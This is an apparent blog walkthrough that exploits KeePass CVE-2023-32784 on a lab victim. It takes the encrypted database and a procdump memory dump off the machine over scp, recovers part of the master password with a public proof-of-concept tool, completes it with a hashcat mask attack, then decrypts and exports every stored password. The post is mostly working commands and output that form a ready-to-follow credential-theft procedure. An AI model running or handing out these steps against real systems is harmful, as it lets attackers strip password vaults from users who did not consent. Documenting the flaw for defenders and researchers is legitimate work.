Introduction
Versions 2.x before 2.54 of the popular password manager KeePass contain vulnerability CVE-2023-32784 allowing an attacker to extract the master password from the application’s memory. BleepingComputer wrote a great article about this vulnerability which you can read here. As of writing, no patch has been released to fix this vulnerability.
Password managers such as KeePass allow users to store all of their passwords in a single password database which is encrypted using a master password. If an attacker can obtain this master password, they can then decrypt the password database, thus gaining access to all of the passwords stored in the database.
In this post, I will demonstrate how to exploit this vulnerability to obtain a victim user’s KeePass password database master password from a process memory dump, and use it to recover all of the plain-text passwords from the database. The victim is running a Windows 11 machine with KeePass version 2.53.1 installed. I will be using a Debian-based distribution to attack the machine.
Post Structure
- Obtain encrypted KeePass password database and KeePass process memory dump from victim machine.
- Extract master password from memory dump.
- Use extracted master password to decrypt victim’s KeePass password database.
Password Database and Memory Dump
The security researcher who discovered the vulnerability goes by the handle vdohney. They released a proof of concept tool which can recover the password from a memory dump. You can find the tool here. The best part is that you do not need to be an administrative user to acquire the KeePass process memory dump. If you are logged in as the user that owns the KeePass process, then you will be able to obtain the memory dump.
Password Database
In this example, I am logged in via SSH on the Windows machine as the victim user bob. The first thing I want to do is locate this user’s encrypted KeePass database file and transfer it back to my local machine.
In Windows, KeePass password databases are created under the user’s Documents directory by default. I will check there first:
dir %HOME%\Documents
The output tells me there is a file named Database.kdbx. This is the KeePass encrypted password database file. In a separate terminal on my local Debian machine, I will create a copy of this file:
scp bob@192.168.1.10:"/C:/Users/bob/Documents/Database.kdbx" .
Memory Dump
Now that I have a copy of the encrypted password database, it’s time to acquire a memory dump of the KeePass process which I can use to extract the master password. There are a variety of ways this can be done, but for this example I will use the Sysinternals ProcDump utility to get a memory dump of the KeePass process.
Assuming the ProcDump executable is available on the victim machine, I will execute the following command in the SSH session:
procdump -ma KeePass
The memory dump file is saved as KeePass.exe_230521_121957.dmp. First I’ll move this file to the bob user’s Documents directory:
move KeePass.exe_230521_121957.dmp %HOME%\Documents
In a separate terminal on my Debian machine, I will create a local copy of this file in my home directory:
scp bob@192.168.1.10:"/C:/Users/bob/Documents/KeePass.exe_230521_121957.dmp" .
Now I’ll clone the proof of concept tool for this vulnerability which I will use to extract the password from the dump file:
git clone https://github.com/vdohney/keepass-password-dumper.git
I’ll change directories into the newly cloned repo and execute the following command to extract the master password from the KeePass process dump:
dotnet run ~/KeePass.exe_230521_121957.dmp
The last line of output displays the password it was able to recover:
Combined: ●{i, N, c, d, e, f, g, -, #, W, X, C, 0, ;}verpool12
The extracted password is verpool12. Now I will attempt to decrypt the Database.kdbx password database. First I’ll install KeePass on my Debian machine:
sudo apt install keepass2
Next I start the program:
keepass2
In the application window, I navigate to File > Open > Open File… > select the Database.kdbx file, and enter the extracted password verpool12:
However, the password does not work!
What’s the deal? The README file of this tool explains that it is able to recover most of the password. Furthermore, the demonstration in the BleepingComputer article about this vulnerability showed they were not able to recover the first two characters of the password. Therefore, some more work needs to be done.
I will use hashcat to recover the rest of the password. First, I create a hash of the encrypted password database file:
keepass2john Database.kdbx > keepasshash
Remove the name of the Database from the file, so that only the hash is left:
cut -d ":" keepasshash -f 2 > hash_only
Confirm the new file contains only the hash:
cat hash_only
$keepass$*2*60000*0*358a9a5ff02c3e09dcc683819e1deb83150804692b589703bcde237d1a897be3*60da2aec5b214d4d59129400110e171aa4fecb80fe7dcd172573f1892ae59387*7ec5c4a9c9a79ce89e509e993911a69a*44abc679d3f754bab18021f500b9b2b4421ec0ac0cef139a3dc5c0c2c85d594c*d6c0ca300fdfc7dc33b2d495cb89dcaf0dde9a9d83b324cac2deed56822af532
Now it’s time to crack the hash. At this point, you can of course use a wordlist to brute force the password, and it may work. However, for this demonstration I am going to use Hashcat’s mask attack feature. Because the part of the password that has been recovered so far is verpool12, I’m going to assume the rest of the character(s) at the beginning are lowercase English letters.
I’ll start by checking all lowercase characters for one additional character:
hashcat -m 13400 hash_only -a 3 -1 ?l ?lverpool12 -O
This didn’t work, so I’ll try again with two:
hashcat -m 13400 hash_only -a 3 -1 ?l?l ?l?lverpool12 -O
And this time it worked! The full password is liverpool12. Obviously this was a pretty bad password, so it was easy to recover. However, I’m sure you can imagine how relatively simple it would be to recover a few characters from a more complex password.
Decrypt The Database
Now for the moment of truth. I will start the KeePass program on my Debian host:
keepass2
And again in the application window I navigate to File > Open > Open File… > select the Database.kdbx file. This time I enter the full password liverpool12:
The database is successfully decrypted! At this point, I can navigate to File > Export and export the entire password database as a CSV file.